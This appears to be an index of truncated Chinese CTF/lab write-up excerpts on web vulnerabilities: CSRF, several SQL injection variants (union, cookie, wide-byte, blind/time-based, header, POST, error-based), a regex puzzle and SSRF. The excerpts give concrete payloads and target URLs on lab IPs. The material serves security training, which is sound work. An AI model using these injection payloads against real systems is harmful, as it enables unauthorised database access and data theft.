CSRF跨站伪造请求WriteUp
1. CSRF漏洞利用的前提是管理员是登录状态 所以先登录一下 admin admin1232. 构造链接 诱导管理员点击链接 审计代码可以得知访问这个链接后会生成modifytmp.inc 再利用后面的文件包含 从而达到利用漏洞的目的http://117.41.229.122:8010/csrf/uploads/dede/s
MYSQL 注入 - 全方位利用WriteUp
1. url上输入 and 1=1 页面正常显示 存在SQL注入漏洞http://120.203.13.75:6815/?id=1 and 1=12. 使用order by 判断字段数量为2个http://120.203.13.75:6815/?id=1 order by 23. 使用联合查询 查询出数据库名为maosheh
Access注入 — Cookie注入WriteUp
1. 打开页面 测试是否可以SQL注入 发现被阻止 http://120.203.13.75:8001/shownews.asp?id=171 and 1=12. 尝试cookie注入 页面可以正常显示document.cookie="id="+escape("171")3. 判断字段数量 字段
SQL注入-宽字节注入WriteUp
第一题:1. 首先尝试输入单引号 发现被转义了http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=1%272. 是用%df合并掉后面的反斜杠 使我们输入单引号生效 使用order by 语句判断字段数量http://120.203.13.75:8150/New/WidecharBased/RankO
SQL注入-盲注、延时注入WriteUp
第一题:1. 输入参数看页面语句2. 闭合单引号并且注释掉后面的语句http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1' and 1=1 %233. 使用order by语句判断字段数量http://120.203.13.75:8150/New/BlindBased/RankOne/sq
SQL注入-Head注入WriteUp
第一题:1. 使用burp抓包 修改user_agent为 1' and sleep(10),'','')# 发现成功延时10秒2. 猜解数据库 这里使用二分法不断尝试 获取数据库名的长度 以及具体的数据库名 然后根据ascii码对照表 最终猜解数据库名为security1'&n
SQL注入-Post注入WriteUp
第一题:1. 闭合单引号使用万能密码 并且使用#号注释掉后面的语句' or 1=1 #2. 和显错注入一样 使用database函数查看数据库名 得到数据库名为security' and 1=2 union select 1,database() #3. 利用系统数据库表获取表名&
SQL注入-显错注入WriteUp
第一题:1. 提示输入一个数字型的id参数2. 闭合单引号 并且注释掉后面的 ' limit 0,1 再更根据 order by子句判断字段数量为3个http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=123 ' order by 3&n
正则表达式【wnyxy001】WriteUp
1.理解正则表达式 /zkaq.*key.{2,9}:\/.*\/(key*key)/i把正则分割为一个个段理解zkaq 理解:普通字符串 zkaq.* 理解:匹配前面的子表达
SSRF漏洞和利用WriteUp
1. 发送pochttp://120.203.13.75:8123/ssrf/typecho-1.0-14.10.9-release/index.php/action/xmlrpc<methodCall> <methodName>pingback.ping</methodName> <